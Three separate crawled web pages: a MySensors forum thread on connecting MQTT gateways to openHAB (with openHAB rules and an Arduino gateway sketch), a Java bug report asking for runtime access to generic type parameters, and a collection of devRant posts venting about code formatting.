"Why do you have two versions of the gateway script, and which version should I use as a basis when adding serial support?" The serial format changed from MySensors 1.3 (protocol 1) to 1.4beta (protocol 2). I was lazy and just cloned the 1.3 version to add 1.4 support (the 2-version). Wouldn't be hard to support both, but I really wrote this script for my own usage. It's not documented and I tried to help Damme in the past to build MQTT support. I'm primarily on 1.4b btw, with some 1.3 setup for backwards sniffer support... If more people start using it I should do some things the nice way.

"Does your gateway take care of node ID assignments?" Not at the moment. Shouldn't be hard to implement though, but when you implement it you run into another issue of mapping the node IDs onto the MQTT topic tree, or accessing the right topic from OpenHAB. Sticking to fixed node IDs seemed to make more sense to me.

"I'm thinking that I will fork your project to add a serial option to your script." Feel free to fork, but the current code is based on AnyEvent. Not that I like it, but it seemed to have the best MQTT support. There is some hacking in the script to get things working, and I don't know how it will behave when switching to serial. Btw, there's one important thing to understand when using the Perl script. When it receives values from a sensor node through the gateway, it's easy to publish the value in the topic tree. When a value has to be sent to an actuator node, the story is different, as the script has to know which topic to subscribe to at the MQTT broker. Currently, when a MySensors node requests a value from the gateway, the script automagically translates this into a subscription to the corresponding topic with the MQTT broker. The dimmer node, for example, calls gw.request(childID, V_DIMMER) from setup to subscribe itself to dimmer messages. Note that sometimes this request gets lost (CRC error or so) and the subscription fails. While not supported by the MySensors library, a robust implementation should wait for a response after requesting this value and retry when it doesn't come. The Perl script stores all current subscriptions persistently (file subscriptions.storage), so restarting the Perl script will not force you to restart all nodes to subscribe again.

And another small one; an RGB dimmer!

MQTT topics (exposed by the MQTT perl script. Node 118 = 3-channel dimmable light):

/mySensors/118/0/V_DIMMER dimmable light RED, accepting integer value between 0 and 100
/mySensors/118/1/V_DIMMER dimmable light GREEN, accepting integer value between 0 and 100
/mySensors/118/2/V_DIMMER dimmable light BLUE, accepting integer value between 0 and 100

Items:

Dimmer Light_R {mqtt=">[server:/mySensors/118/0/V_DIMMER:state:*:default]"}
Dimmer Light_G {mqtt=">[server:/mySensors/118/1/V_DIMMER:state:*:default]"}
Dimmer Light_B {mqtt=">[server:/mySensors/118/2/V_DIMMER:state:*:default]"}
Color Light_RGB "RGB Dimmer" (Lights)

Rules to distribute the colorwheel value over the R, G, B dimmers:

rule "Set RGB value"
when
    Item Light_RGB changed
then
    var HSBType hsbValue = Light_RGB.state as HSBType
    postUpdate( Light_R, hsbValue.red.intValue )
    postUpdate( Light_G, hsbValue.green.intValue )
    postUpdate( Light_B, hsbValue.blue.intValue )
end

No button control here; just using the colorwheel and on/off buttons in the GUI. Enjoy!

Damme: rule to calculate absolute humidity (g H2O / m3 air) and dew point from degrees Celsius and rH%:

import java.lang.Math
import java.lang.Integer
import java.lang.Double

rule "Calculate absolute humidity (g h2o / m3 air) and dew point"
when
    Item temp1 changed or Item hum1 changed
then
    var temp = temp1.state as DecimalType
    var hum = hum1.state as DecimalType
    var t1 = (17.271*temp.floatValue) / (237.7+temp.floatValue) + Math::log(hum.floatValue*0.01)
    var dew = (237.7 * t1) / (17.271 - t1)
    var Number c1 = ((17.67*temp.floatValue)/(temp.floatValue+243.5))
    var abs = (Math::pow(Math::E,c1.doubleValue)*6.112*2.1674*hum.floatValue) /(273.15+temp.floatValue)
    Dewpoint1.postUpdate(dew)
    AbsHum1.postUpdate(abs)
end

Hi everyone! I'm new to the topic. I find the world of MySensors very interesting. I would like to ask whether there is a description somewhere of how I can set up my MQTT openHAB bindings, e.g. for an Arduino LED dimmer? I already read the broker-gateway page. I made a humidity sensor node and a relay node, too. It would be good if we had a basic description or example project for beginners for every sensor type.
It is not rocket science to get openHAB running with the MQTT gateway, see for example my post with DS/Light/Relay in . But sure, it would be great to put a wiki with all sensor settings for openHAB together on one page. I needed to read/search for some days to put the knowledge together...

Example of the openHAB screenshots on mobile. There you also see the mapping of the sensor.

How can I make openHAB respond to gw.request(sensor, V_HEATER_SW, 0)? I have a relay actuator sketch and in setup() I have this:

for (int sensor=1; sensor<=NUMBER_OF_RELAYS; sensor++) {
  gw.present(sensor, S_HEATER);
  gw.request(sensor, V_HEATER_SW, 0);
}

Practically, I would like openHAB to respond to the gw.request with the actual state of the relay. My item definition is the following. I am able to turn the relay ON and OFF, but I need to find a way to get the values of the relays from openHAB when the relay actuator Arduino reboots.

Switch Incalzire_Releu_GF_Living2 "Incalzire Releu Living 2" <heating> (Incalzire) {mqtt=">[mysensor:MyMQTT/3/2/V_HEATER_SW:command:ON:1],>[mysensor:MyMQTT/3/2/V_HEATER_SW:command:OFF:0]"}

Is there any sample code for controlling an RGB LED here?

Sorry to necro this thread, but I had a question. I believe I read somewhere that you can use a serial gateway connected to a Pi and have openHAB/MQTT run on the Pi? How would one go about setting this up? Currently I have 2 Unos, one running as the serial gateway. I plan to replace the serial gateway with a Nano; I'm still waiting on that. I just got the Pi last night, so I'm still working on getting everything up and running on that, but I'd rather just connect the gateway directly to the Pi rather than have to get a wifi/ethernet module for one of the Arduinos. Also, probably outside the scope of this thread (and that's fine), but does anyone have a good guide for setting up the Pi for openHAB/MQTT?

@Chaotic, try this.. Worked great for me

@mhortman Didn't work for me:

sudo wget
--2015-03-27 10:46:51--
Resolving repo.mosquitto.org (repo.mosquitto.org)... 85.119.83.194, 2001:ba8:1f1:f271::2
Connecting to repo.mosquitto.org (repo.mosquitto.org)|85.119.83.194|:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
2015-03-27 10:46:51 ERROR 403: Forbidden.

quocanhcgd: My house has 4 floors, and I plan to build one gateway for each floor. Each floor has 4-5 sensors (temp, hum, relay, light, door, RF light). Each sensor uses NRF24 to connect to the gateway. The gateway connects to the RAS by Ethernet. My question: can I build 2 MQTT gateways connected to openHAB? If not, what is my solution? Thanks

rachmat aditiya27: You can build more than 1 gateway for that, but rather than MQTT I think it's better to use an Ethernet or serial gateway, because the MQTT gateway has a lot of problems; I tried it for months. You can forward MQTT from FHEM to Mosquitto.

@Yveaux could you please post your Arduino code for controlling your RGB (I guess it's an RGB LED strip!?)? Thanks for your help!!

I built up an MQTT gateway and configured it in openhab.cfg. Now I would like to set up a Mosquitto server on a Raspberry Pi, too. Is it possible to add this new MQTT server to openhab.cfg beside the already set up MQTT gateway?

Why not set up the Mosquitto broker, connect openHAB to it, and use the MQTTClientGateway, which connects as a client to the Mosquitto broker? This has been discussed at several places in the forum already. You can find the MQTTClientGateway in the development branch.

@tomkxy I've been reading the forums for weeks now, but I can't get it to work. I've successfully set up Mosquitto on my RasPi, and openHAB is running there too. The MQTTEthernetGateway (from the start page) is pingable. One sensor is running and working. I don't know how to get the MQTTEthernetGateway to communicate with the Mosquitto broker. I've read about "bridging", which made me even more confused than I already was. So, right now, when I subscribe to MyMQTT/# using "mosquitto_sub -t MyMQTT/#" on my RasPi, I don't see any communication coming in. What do I have to do to get the MQTTEthernetGateway (=MQTTClientGateway I suppose!?!) connecting to Mosquitto? Or: must I set up the MQTTEthernetGateway like this: instead of using the sketch from? Thanks for your help!!

@siod I am not sure what code exactly you are referring to when you say MQTTEthernetGateway. In the MySensors GitHub he cleaned up the code I merged from my GitHub. I did not test that code so far, so I can only comment on the MQTTClientGateway you can find in my GitHub in branch MQTTClientGateway. I suggest you start off ignoring openHAB for the moment. Just test with clients using the mosquitto_sub and mosquitto_pub commands from Mosquitto. In the MQTTClientGateway sketch you need to adapt the IP-related info. See the excerpt from my config. Depending on whether you use the signing feature or not, you have to comment the define MY_SIGNING_FEATURE in my_config.h. If your sketch is running you should see one additional client connected on your Mosquitto broker. You can subscribe with mosquitto_sub to $SYS/#, which gives you all sorts of statistics. In order to check whether your Arduino connected to the broker, you can also put a debug statement in the loop function. Just check and print the return code from the client.connect() call. If the connect did not work, double check that you configured the correct IP address and port, and also make sure that you fulfill the authentication requirements configured in the broker. If the connection works, publish a message to the broker for a topic like MyMQTT/27/5/V_PRESSURE. The MQTTClientGateway sketch should receive that and you should see it in the log. Next, reset your sensor node. You should see a message being processed by MQTTClientGateway and then being published to the MQTT broker. Only after all that works should you start dealing with openHAB. Hope that helps.

Hi tomkxy, thanks for your detailed answer. I will test all your suggestions after I get my GW working on the LAN; right now it's not answering pings and I don't get why.... I've uploaded the ntruchsess sketch and configured the IP address, port and MAC. When I was talking about MQTTEthernetGateway I was talking about the MySensors sketch at. I will get back to you and give you more info as soon as the gateway in its current state works in my network!

@siod I adapted the ntruchsess code for the MySensors library version 1.5, which you find here.

I could compile your code now; unfortunately I still cannot ping the GW. BTW: in ntruchsess' code I had to enter the Mosquitto broker IP. Why isn't this part in your code?

//replace with ip of server you want to connect to, comment out if using 'remote_host'
uint8_t remote_ip[] = { 192, 168, 1, 50 };

It is the same in my code. See the code extract in the previous reply above. The variable is remote_ip[].
Sorry, but I can't find it in -

/*
 * Created by Daniel Wiegert <[email protected]>
 *
 * DESCRIPTION
 * MyMQTT Broker Gateway 0.1b
 * Latest instructions found here:
 */

#include <DigitalIO.h>
#include <SPI.h>
#include <MySigningNone.h>
#include <MyTransportRFM69.h>
#include <MyTransportNRF24.h>
#include <MyHwATMega328.h>
#include <MySigningAtsha204Soft.h>
#include <MySigningAtsha204.h>
#include <MySensor.h>
#include <MsTimer2.h>
#include <Ethernet.h>
#include "MyMQTT.h"

#define INCLUSION_MODE_TIME 1 // Number of minutes inclusion mode is enabled
#define INCLUSION_MODE_PIN 3  // Digital pin used for inclusion mode button

#define TCP_PORT 1883                       // Set your MQTT Broker Listening port.
IPAddress TCP_IP ( 192, 168, 1, 51 );       // Configure your static ip-address here
byte TCP_MAC[] = { 0x02, 0xDE, 0xAD, 0x00, 0x00, 0x42 }; // Mac-address - You should change this! see note *2 above!

//////////////////////////////////////////////////////////////////

// NRFRF24L01 radio driver (set low transmit power by default)
MyTransportNRF24 transport(RADIO_CE_PIN, RADIO_SPI_SS_PIN, RF24_PA_LEVEL_GW);
//MyTransportRFM69 transport;
MyHwATMega328 hw; // hardware profile (assumed; this declaration was dropped from the forum paste)
MySensor gw(transport, hw /*, signer*/);

EthernetServer server = EthernetServer(TCP_PORT);
EthernetClient *currentClient = NULL;
MyMessage msg;
char convBuf[MAX_PAYLOAD*2+1];
char broker[] PROGMEM = MQTT_BROKER_PREFIX;
bool MQTTClientConnected = false;
uint8_t buffsize;
char buffer[MQTT_MAX_PACKET_SIZE];
volatile uint8_t countRx;
volatile uint8_t countTx;
volatile uint8_t countErr;

void writeEthernet(const char *writeBuffer, uint8_t *writeSize)
{
#ifdef TCPDUMP
  Serial.print(">>");
  char buf[4];
  for (uint8_t a=0; a<*writeSize; a++) {
    sprintf(buf,"%02X ",(uint8_t)writeBuffer[a]);
    Serial.print(buf);
  }
  Serial.println("");
#endif
  server.write((const uint8_t *)writeBuffer, *writeSize);
}

void processEthernetMessages()
{
  char inputString[MQTT_MAX_PACKET_SIZE] = "";
  byte inputSize = 0;
  byte readCnt = 0;
  byte length = 0;
  EthernetClient client = server.available();
  if (client) {
    while (client.available()) {
      // Save the current client we are talking with
      currentClient = &client;
      byte inByte = client.read();
      readCnt++;
      if (inputSize < MQTT_MAX_PACKET_SIZE) {
        inputString[inputSize] = (char)inByte;
        inputSize++;
      }
      if (readCnt == 2) {
        length = (inByte & 127) * 1;
      }
      if (readCnt == (length+2)) {
        break;
      }
    }
#ifdef TCPDUMP
    Serial.print("<<");
    char buf[4];
    for (byte a=0; a<inputSize; a++) {
      sprintf(buf, "%02X ", (byte)inputString[a]);
      Serial.print(buf);
    }
    Serial.println();
#endif
    processMQTTMessage(inputString, inputSize);
    currentClient = NULL;
  }
}

void incomingMessage(const MyMessage &message)
{
  rxBlink(1);
  sendMQTT(message);
}

void setup()
{
  Ethernet.begin(TCP_MAC, TCP_IP);
  countRx = 0;
  countTx = 0;
  countErr = 0;
  // Setup led pins
  pinMode(RADIO_RX_LED_PIN, OUTPUT);
  pinMode(RADIO_TX_LED_PIN, OUTPUT);
  pinMode(RADIO_ERROR_LED_PIN, OUTPUT);
  digitalWrite(RADIO_RX_LED_PIN, LOW);
  digitalWrite(RADIO_TX_LED_PIN, LOW);
  digitalWrite(RADIO_ERROR_LED_PIN, LOW);
  // Set initial state of leds
  digitalWrite(RADIO_RX_LED_PIN, HIGH);
  digitalWrite(RADIO_TX_LED_PIN, HIGH);
  digitalWrite(RADIO_ERROR_LED_PIN, HIGH);
  // Add led timer interrupt
  MsTimer2::set(300, ledTimersInterrupt);
  MsTimer2::start();
  // give the Ethernet interface a second to initialize
  delay(1000);
  // Initialize gateway at maximum PA level, channel 70 and callback for write operations
  gw.begin(incomingMessage, 0, true, 0);
  // start listening for clients
  server.begin();
  Serial.println("Ok!");
  Serial.println(TCP_IP);
}
void loop()
{
  gw.process();
  processEthernetMessages();
}

inline MyMessage& build (MyMessage &msg, uint8_t destination, uint8_t sensor, uint8_t command, uint8_t type, bool enableAck)
{
  msg.destination = destination;
  msg.sender = GATEWAY_ADDRESS;
  msg.sensor = sensor;
  msg.type = type;
  mSetCommand(msg,command);
  mSetRequestAck(msg,enableAck);
  mSetAck(msg,false);
  return msg;
}

char *getType(char *b, const char **index)
{
  char *q = b;
  char *p = (char *)pgm_read_word(index);
  while (*q++ = pgm_read_byte(p++));
  *q=0;
  return b;
}

void processMQTTMessage(char *inputString, uint8_t inputPos)
{
  char *str, *p;
  uint8_t i = 0;
  buffer[0]= 0;
  buffsize = 0;
  (void)inputPos;

  if ((uint8_t)inputString[0] >> 4 == MQTTCONNECT) {
    buffer[buffsize++] = MQTTCONNACK << 4;
    buffer[buffsize++] = 0x02; // Remaining length
    buffer[buffsize++] = 0x00; // Connection accepted
    buffer[buffsize++] = 0x00; // Reserved
    MQTTClientConnected=true;  // We have connection!
  }
  if ((uint8_t)inputString[0] >> 4 == MQTTPINGREQ) {
    buffer[buffsize++] = MQTTPINGRESP << 4;
    buffer[buffsize++] = 0x00;
  }
  if ((uint8_t)inputString[0] >> 4 == MQTTSUBSCRIBE) {
    buffer[buffsize++] = MQTTSUBACK << 4;         // Just ack everything, we actually dont really care!
    buffer[buffsize++] = 0x03;                    // Remaining length
    buffer[buffsize++] = (uint8_t)inputString[2]; // Message ID MSB
    buffer[buffsize++] = (uint8_t)inputString[3]; // Message ID LSB
    buffer[buffsize++] = MQTTQOS0;                // QOS level
  }
  if ((uint8_t)inputString[0] >> 4 == MQTTUNSUBSCRIBE) {
    buffer[buffsize++] = MQTTUNSUBACK << 4;
    buffer[buffsize++] = 0x02;                    // Remaining length
    buffer[buffsize++] = (uint8_t)inputString[2]; // Message ID MSB
    buffer[buffsize++] = (uint8_t)inputString[3]; // Message ID LSB
  }
  if ((uint8_t)inputString[0] >> 4 == MQTTDISCONNECT) {
    MQTTClientConnected=false; // We lost connection!
  }
  if (buffsize > 0) {
    writeEthernet(buffer,&buffsize);
  }

  // We publish everything we get, we dont care if its subscribed or not!
  if ((uint8_t)inputString[0] >> 4 == MQTTPUBLISH || (MQTT_SEND_SUBSCRIPTION && (uint8_t)inputString[0] >> 4 == MQTTSUBSCRIBE)) {
    buffer[0]= 0;
    buffsize = 0;
    // Cut out address and payload depending on message type.
    if ((uint8_t)inputString[0] >> 4 == MQTTSUBSCRIBE) {
      strncat(buffer,inputString+6,inputString[5]);
    } else {
      strncat(buffer,inputString+4,inputString[3]);
    }
#ifdef DEBUG
    Serial.println(buffer);
#endif
    // TODO: Check if we should send ack or not.
    for (str = strtok_r(buffer,"/",&p) ; str && i<4 ; str = strtok_r(NULL,"/",&p)) {
      if (i == 0) {
        if (strcmp_P(str,broker)!=0) { // look for MQTT_BROKER_PREFIX
          return; // Message not for us or malformatted!
        }
      } else if (i==1) {
        msg.destination = atoi(str); // NodeID
      } else if (i==2) {
        msg.sensor = atoi(str);      // SensorID
      } else if (i==3) {
        unsigned char match=255;     // SensorType
#ifdef MQTT_TRANSLATE_TYPES
        for (uint8_t j=0; strcpy_P(convBuf, (char*)pgm_read_word(&(vType[j]))) ; j++) {
          if (strcmp((char*)&str[2],convBuf)==0) { // Strip V_ and compare
            match=j;
            break;
          }
          if (j >= V_TOTAL) break;
        }
#endif
        if ( atoi(str)!=0 || (str[0]=='0' && str[1] =='\0') ) {
          match=atoi(str);
        }
        if (match==255) {
          match=V_UNKNOWN;
        }
        msg.type = match;
      }
      i++;
    }
    // Check if package has payload
    if ((uint8_t)inputString[1] > (uint8_t)(inputString[3]+2) && !((uint8_t)inputString[0] >> 4 == MQTTSUBSCRIBE)) {
      strcpy(convBuf,inputString+(inputString[3]+4));
      msg.set(convBuf); // Payload
    } else {
      msg.set("");      // No payload
    }
    txBlink(1);
    if (!gw.sendRoute(build(msg, msg.destination, msg.sensor, C_SET, msg.type, 0))) errBlink(1);
  }
}

void sendMQTT(const MyMessage &inMsg)
{
  MyMessage msg = inMsg;
  buffsize = 0;
  if (!MQTTClientConnected) return; // We have no connections - return
  if (msg.isAck()) {
    //, msg.sender, 255, C_INTERNAL, I_CONFIG, 0).set(MQTT_UNIT))) errBlink(1); return; }
    //, msg.sender, 255, C_INTERNAL, I_ID_RESPONSE, 0).set(newNodeID))) errBlink(1); return; }
  }
  if (mGetCommand(msg)!=C_PRESENTATION) {
    if (mGetCommand(msg)==C_INTERNAL) msg.type=msg.type+(S_FIRSTCUSTOM-10); // Special message
    buffer[buffsize++] = MQTTPUBLISH << 4; // 0:
    buffer[buffsize++] = 0x09; // 1: Remaining length with no payload, we'll set this later to correct value, buffsize -2
    buffer[buffsize++] = 0x00; // 2: Length MSB (Remaining length can never exceed ff, so MSB must be 0!)
    buffer[buffsize++] = 0x08; // 3: Length LSB (ADDR), We'll set this later
    strcpy_P(buffer+4, broker);
    buffsize+=strlen_P(broker);
#ifdef MQTT_TRANSLATE_TYPES
    if (msg.type > V_TOTAL) msg.type=V_UNKNOWN; // If type > defined types set to unknown.
    buffsize+=sprintf(&buffer[buffsize],"/%i/%i/V_%s",msg.sender,msg.sensor,getType(convBuf, &vType[msg.type]));
#else
    buffsize+=sprintf(&buffer[buffsize],"/%i/%i/%i",msg.sender,msg.sensor,msg.type);
#endif
    buffer[3]=buffsize-4; // Set correct address length on byte 4.
#ifdef DEBUG
    Serial.println((char*)&buffer[4]);
#endif
    msg.getString(convBuf);
    for (uint8_t a=0; a<strlen(convBuf); a++) { // Payload
      buffer[buffsize++] = convBuf[a];
    }
    buffer[1]=buffsize-2; // Set correct Remaining length on byte 2.
    writeEthernet(buffer,&buffsize);
  }
}

Also I must mention I am using an ENC28J60 chip on my Ethernet module. Could that be the reason it's not answering pings?

edit: Ah, sure, got the network problem:

//#include <Ethernet.h>
#include <UIPEthernet.h>

But still, remote_ip is not in the code I copied from your GitHub library. Maybe you can post the correct code here!?

edit: Ok, finally got it. I must admit I am not good at using GitHub, it's very new to me... Question: do I always have to download the complete branch and overwrite my Arduino files with it, or is it enough to only download your MQTTClientGateway example? Just for me to understand this... Of course, when using the UIPEthernet library, the sketch is too big now... Is there a workaround?
As I wrote before the current development branch of the official MySensors library contains a cleaned up and re-factored version I didn't test and can say nothing about. I found a W5100 Ethernet Module et voila, everything works fine now!!! Thanks for your help @tomkxy !! @siod If it works now you probably can give it a try with the latest version in the development branch of the Mysensor library. And another small one; an RGB dimmer! I tried this 3-dimmer approach, but I found it not responsive enough. Sometimes the arduino can't be fast enough to process 3 consecutive requests, and the result is lame. (it changes 2 of 3 colors only) I think this would be more efficient with transmitting just one cummulative message with all 3 colors and decoding it in arduino. @ericsko sounds to me that you're missing a message instead of the Arduino being too 'slow'. But go ahead, use a single message to send the rgb value and post your findings in here!
https://forum.mysensors.org/topic/302/openhab-mqtt-tips-hints
CC-MAIN-2020-24
en
refinedweb
Name: jl125535 Date: 09/08/2004

A DESCRIPTION OF THE REQUEST:
The type that is used as a parameter for templates (generics) is not accessible at runtime. For example, the following programs do not compile.

--------------------------------------------
public class a<T> {
    public void tellMeParameterType() {
        System.out.println(T.class.getName());
    }

    public static void main(String args[]) {
        (new a<String>()).tellMeParameterType();
        (new a<Integer>()).tellMeParameterType();
    }
}
-----------------------------------------------------
public class b<T> {
    public void isMine(Object object) {
        System.out.println(object instanceof T);
    }

    public static void main(String args[]) {
        (new b<String>()).isMine("Test");
        (new b<Integer>()).isMine("Test");
    }
}

JUSTIFICATION:
This functionality is essential for frameworks that use reflection and generics. Sometimes decisions have to be made based on the type supplied as a parameter.

EXPECTED VERSUS ACTUAL BEHAVIOR:
EXPECTED - If the type is asked for in an instance, assign it to a private variable, then use this variable in the instance. Also, methods like newInstance() could require such a variable to be supplied, or use the upper bound if it is not supplied. Another variant is to allow the type to be referenced in the constructor only, so that the following sample works. In that case the user pays only for actually used features:

public class b1<T> {
    final Class myClass;

    public b1() {
        myClass = T.class;
    }

    public void isMine(Object object) {
        System.out.println(myClass.isAssignableFrom(object.getClass()));
    }

    public static void main(String args[]) {
        (new b1<String>()).isMine("Test");
        (new b1<Integer>()).isMine("Test");
    }
}

ACTUAL - The samples just do not work.

---------- BEGIN SOURCE ----------
See samples above. The best thing would be for all of them to start working, but at least b1 should work in order for generics to be useful.
---------- END SOURCE ----------

CUSTOMER SUBMITTED WORKAROUND:
None, except to pass the class explicitly in the constructor of the object. But that would completely defeat the purpose of generics.
(Incident Review ID: 302318)
======================================================================
https://bugs.java.com/bugdatabase/view_bug.do?bug_id=5099091
CC-MAIN-2020-24
en
refinedweb
What the fuck, student. Why in fuck would you submit a Python assignment in Word? So that all the formatting - you know, the stuff that tells Python how to run the code - all fucks up. How the fuck can I mark this?

Me: Oh it's just a simple formatting/styling issue, shouldn't take but a minute
Computer: *laughs in html*

Code review. Now let me be clear and say I'm not against code review in general and I think it's a critical part of the engineering process... But picture this situation:
Q: "Why is this const?"
A: because it is invariant, and more information for the compiler means it's easier to forward constants etc.
Q: "why don't you do it this other way that's no better than what you did here?"
A: "stop wasting time"
Q: "I'm going to block submission of this emergency patch because of code formatting and then go home for the day"
A: ...
Q: <asks about some other c++ semantic related to the change under review>
A: <explains basic c++ language topology while simultaneously wondering why this is the appropriate forum for it>
Q: "you should have designed this the way I would"
A: ...
There are some great code reviewers on my team, but there are just as many time wasters whose comments seem more related to not knowing how c++ works and how compilers work than to actual deficiencies in my code. I've also tried to bring better readability to our codebase in ways that are so subtle they are almost style agnostic, and that has been met with fierce resistance (our codebase is actually quite good but has no naming conventions or file conventions whatsoever, and it's nuts how frustrating that is). I guess to put it more precisely: my issue with code review starts when it becomes somebody else's forum to prove they're smart enough and hard working enough to be worth their salary, rather than a forum for improving submissions and catching bugs. I have a big fucking issue with that.

After the backlash I received from some devRant users about my text formatting, here is a properly formatted, and properly punctuated rant. You see... It's boring.

@dfox Can we have the option to include code blocks in rants and comments? So that they're formatted as monospace text? I mean we can get around it with pictures, but it would be a nice option to include code with an appropriate font.

Why is it formatted like this? Can't they just do a \n on a capital letter? This looks so terrible 😢

Telling someone you don't like the way they format their code is like... telling them their girlfriend is ugly.

Warning: the following image may cause severe eye damage and temporary autism. Viewer discretion is advised!

<label> Name</label> I don't know what kind of maniac formats their HTML like this. How do you sleep well at night?

I love the JSON format. It is so simple, powerful, easy to read and all that good stuff. There is only one thing I wish JSON could support, and that's commenting.

Actual formatting in my high school textbook. (Also fstream.h.) And the code my teacher writes isn't much better.

devRant feature idea: Text formatting in Markdown. This is a community for developers, after all.

Oh my dear devRant, please add code-formatting standards & check-style validation on submitted code snippets, because the wrong indentation of code snippet posts on devRant is driving me crazy. Check-style ftw!

Accidentally restored a months-old backup because I thought the software was using imperial date formatting. I was wrong.

So following from this rant:...

Warning, long rant ahead. I resigned and my last day is tomorrow. I released the app updates a week ago and patched a couple of bugs for iOS. My boss and the idiot who can't open an email on his phone go off to use the app as part of some training thing for the company. I got a call yesterday saying the Android app has issues, and I proceeded to ask my boss what type of phone they have: "Samsung and Huawei". I thought okay, I need more info: "what type of phone..." He responds with "wouldn't have a clue"... I can't see the phone, didn't get a screenshot or anything like that, but I'm expected to just know what the phone is. My boss goes on to say "yeah, it's the app" (he is literally the most computer illiterate person I could think of, aside from the guy who can't open emails on his phone - how the fuck do you know that?). Me: "From all the testing I've done, the app works." Look, if you want a more robust, error-free update, hire more than one developer. I can't test every single fucking use case to determine the app is 100% bug free; I've tested on at least 10 phones before releasing the update just to be absolutely sure I got everything done, and okay, I missed something. So I proceed to get my boss to tell the guy who has the issue that I'll sign him up to the testing app to find out the cause and hopefully fix the issue. I set up Crashlytics, send the email, and get a call from my boss saying the guy didn't get the email. Well okay, is it my problem that we have two emails for the same person where one of them is a typo? No, it's the guy who asked and wrote down the email instead of actually forwarding a blank email from him to be absolutely sure. I sent the email to both just to be on the safe side. I swear, if he is another idiot who can't open emails on his phone, well, I can't help him. The app works on my phone and the phones at work. I need a phone where it doesn't work so I can get a solution I know works, but if I have to deal with these idiots that can't even check an email, how the fuck do I do that? Sorry about the formatting, just needed to get this off my chest before I start work.

Who the fuck came up with the idea of using SharePoint? What even is it?! Is it a website, wiki, document repo...? Our version seems to be a broken wiki with no info content, old links, illogical navigation. And somehow Word documents are integrated into it. Sometimes you see some weird calendar and timelines (from old projects). You can navigate into a folder, but you cannot get back. There's no ".." button?? You can map it like OneDrive to yourself, but Windows doesn't support any document version control. Where's the check in/out option from the explorer menu??? I sure as shit have those for SVN, Git etc. Is there a new version created every time I press ctrl-s, or only when I close the document? Well, I could open the document in "online" mode. Ok, the formatting goes weird and everything is super slow. But at least I can fuck up someone else's document by accidentally copy/pasting stuff, deleting lines, hitting my face into the keyboard etc. There's automatically a new version added! Somehow you can enable the forced check in/out for documents. Obviously only the library admin can do that. And since he's just a program manager, he has no clue what the fuck version control or document management is. So he has this thing on his "things to do" list. For him, document management means sending various spec versions as email attachments. And the developers can figure out together who has the most recent one. How did M$ push this piece of shit to corporations? They even use this crap for the intranet, making it slower than the creation of galaxies. Though it's ok, since you cannot find anything from the intranet. It's all just head honchos' blogs, seasonal greetings and stock market statuses. Nowhere is the downstairs cafeteria menu for the day to be seen. Or where to report a broken toilet. You know, stuff that 99% of people would like to see. I complained to M$ about SharePoint, but apparently there's no problem. You can code it yourself? Yeiii! So, instead of just updating some line in a design spec, I have to take a 3 month class and get an MS certificate, code some class-based-web-shit for 6 months and maybe, maybe then I can make the page/document look normal? I am thinking that I will just start writing my specs on paper. I will put them on the shelf, and if you want to read one, you will check it out manually. And if someone else tries to edit it while you are editing it, you just cover the paper with your hands. There might be a requirement to make the document look more like MS Word, but that's easy to do. Just go to the WC with the paper and wipe with it a couple of times.

1. Talked to a dev and found out he never used git. 2. Saw a guy formatting code in Eclipse line by line, even when Eclipse provides automatic formatting.

Code comment rant of the day... fcking excel just cost me over half an hour to fix the fking formatting...

Spent 8 months building and customizing a vtiger database for work. Tons of fun. Got it to a point where I have saved a ton of time for all the people that use the program. Boss wants to have reports out of it each morning, so I showed him how to run reports and adjust entries. He didn't like the formatting of the report. So I set up the report to export to Excel and took another 2 hours building a macro that formats the way he likes and prints the report for him. He used to take a month filling out paperwork to get a report; now all he has to do is open a favorite in his web browser, make 3 clicks, then open an Excel and type ctrl+r and it's done. He tells me it seems too complicated and is considering going back to the paper method... so frustrating.

In pull requests, I point out every spelling mistake, unnecessary whitespace and formatting issue. It's not really a bad practice, but my teammates don't like it.

I spent a *very* long time trying to work out why my README file wasn't formatting.... It didn't have a .md extension. :/

Added our new Terms of Service and privacy policy to the website today, copy and paste from a Word doc.... 15 pages of legalese with formatting. Blergh!!

For other just-beginning web devs: spending hours fiddling over a bunch of CSS layout/formatting/animation to make a small widget look just right... then showing someone your 500ms animation and they say "yeah and....???"

Common Lisp's format function. Because it supports some crazy convenient formatting directives, such as: writing numbers as words, writing numbers as Roman numerals, correctly writing plurals, etc. The code in the image will print: one cat, two cats, three cats ... seven cats

devRant formatting template: I'm not [insert negative trait] but [insert rant contradicting the first statement]

Google: The almighty bug fixes for Android Studio are now live, see version 3.4
Android Studio: But I still freeze when I need to format xml files tho, but who cares...
** Days later
Google: Android Studio 3.4.1 is now live! Smash those bugs!
Android Studio: lool I still freeze when formatting an xml file ¯\_(ツ)_/¯

Anyone else been lightly formatting rants and comments with **markdown** hoping for it to be implemented? _I know I have_

When u send ur code for review and instead of getting comments on the logic u put in, u get 10+ comments regarding variable names, extra lines and formatting. LMF

So apparently the Android and iOS versions of WhatsApp interpret formatting marks differently.

Turns out the script wasn't in root...

I hate it when book publishers of tech books don't have their own DRM-free formats. I then have to go on Amazon and see that the Kindle version is only 10% cheaper than paper. Then I factor in the fact that they probably fucked up the formatting on the ebook. So, I end up just buying the paper one and my office continues to resemble a mad scientist's library.

why do so many programmers have so little regard for grammar/syntax, spelling and formatting when it comes to written communication?? it's not as though you can get away with ignoring their analogues when coding

Welp, just found the first horrifying inaccuracy in Silicon Valley... Richard prefers tabs over spaces. That can't possibly be a thing, right? Right!!?

For the love of all things sacred, put a damn space between your parentheses and whatever comes before/after them. It is totally not cool to read if(expression){}. No, seriously, I mean that.

People who not just completely skip or ignore PEP8 altogether, but write just the most badly, most ridiculously formatted blocks of shit, really should be banned from using Python, pending review of a 400-word essay on why PEP8 is gr8 m8. How are simple formatting concepts completely disregarded? More to the point, why would you want to write badly formatted, squashed-together crap? Import statements, please, at the top of the program, dude. Why the fuck are you using 3 spaces for indents? Why are you naming every single variable with a capital letter? Why aren't you using spaces? Oh wait, no, I see you used some here, but not there - why? It's like you're trying to be as inconsistent as possible. Naming your variables 'a' and 's' and 'bb'? Ok, I'll deal with it; at least you probably won't misspell those later on. But! It's 2020. Why are people who clearly don't know a right click from their left nut writing shit without at least any linter? "Help me debug this!" Sorry sir, but it looks to be written LIKE SHIT. No wonder it doesn't work, and furthermore, NO WONDER YOU DON'T UNDERSTAND *WHY* IT DOESN'T! If it was readable, I'm sure you'd have nooooo problem. I want to make a plugin for vscode and PyCharm so that when you paste horribly formatted shit into it, the sound file are_you_shitting_me.mp3 plays at max volume.

